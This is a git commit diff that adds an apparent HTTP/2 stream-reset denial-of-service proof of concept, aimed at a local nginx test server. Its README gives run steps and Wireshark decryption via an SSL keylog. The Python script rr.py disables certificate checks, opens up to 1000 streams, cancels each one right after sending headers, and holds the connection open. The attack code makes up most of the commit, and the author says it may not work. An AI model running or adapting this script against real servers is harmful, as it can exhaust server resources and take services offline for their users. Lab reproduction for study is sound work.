Add PoC
This commit is contained in:
parent
1a42bd06fe
commit
188ab59701
5
.gitignore
vendored
5
.gitignore
vendored
@ -2,4 +2,7 @@ venv/
|
||||
.idea/
|
||||
|
||||
__pycache__/
|
||||
*.py[cod]
|
||||
*.py[cod]
|
||||
|
||||
# ignore ssl keylogs
|
||||
*.log
|
||||
|
18
README.md
18
README.md
@ -1,12 +1,22 @@
|
||||
# rr-dev
|
||||
|
||||
start http/2 enabled nginx server:
|
||||
1. start http/2 enabled nginx server:
|
||||
```
|
||||
cd server
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
run poc:
|
||||
2. start capturing traffic in wireshark
|
||||
|
||||
3. run poc script:
|
||||
```
|
||||
# needs to be written first, lol
|
||||
```
|
||||
python rr.py
|
||||
```
|
||||
|
||||
4. decode traffic in wireshark using `ssl-keylog.log` as the ssl keyfile
|
||||
|
||||
## notes
|
||||
no clue if this actually works, but it seems to match the same behavior
|
||||
mentioned in the cloudflare blog.
|
||||
|
||||
greets to psyk0, slerig, and all the other juggalols out there
|
||||
|
53
src/rr.py
53
src/rr.py
@ -1 +1,54 @@
|
||||
"""rrpoc"""
|
||||
import socket
|
||||
import ssl
|
||||
import certifi
|
||||
|
||||
import h2.connection
|
||||
import h2.events
|
||||
|
||||
from time import sleep
|
||||
|
||||
ctx = ssl.create_default_context(cafile=certifi.where())
|
||||
ctx.set_alpn_protocols(['h2'])
|
||||
ctx.check_hostname = False
|
||||
ctx.verify_mode = ssl.CERT_NONE
|
||||
ctx.keylog_filename = 'ssl-keylog.log'
|
||||
|
||||
|
||||
def send_rr_packets(server='localhost', port=443, max_streams=1000):
|
||||
s = socket.create_connection((server, port))
|
||||
s = ctx.wrap_socket(s, server_hostname=server)
|
||||
c = h2.connection.H2Connection()
|
||||
c.initiate_connection()
|
||||
s.sendall(c.data_to_send())
|
||||
|
||||
headers = [
|
||||
(':method', 'GET'),
|
||||
(':path', '/foo'),
|
||||
(':authority', server),
|
||||
(':scheme', 'https'),
|
||||
]
|
||||
|
||||
for _ in range(max_streams):
|
||||
sid = c.get_next_available_stream_id()
|
||||
c.send_headers(
|
||||
stream_id=sid,
|
||||
headers=headers,
|
||||
end_stream=True
|
||||
)
|
||||
c.reset_stream(sid)
|
||||
s.sendall(c.data_to_send())
|
||||
|
||||
# Add sleep or else the socket gets closed which causes server to
|
||||
# stop trying to respond to our requests.
|
||||
sleep(60)
|
||||
|
||||
s.close()
|
||||
|
||||
|
||||
def main():
|
||||
send_rr_packets(server='localhost', port=443)
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
|
Loading…
Reference in New Issue
Block a user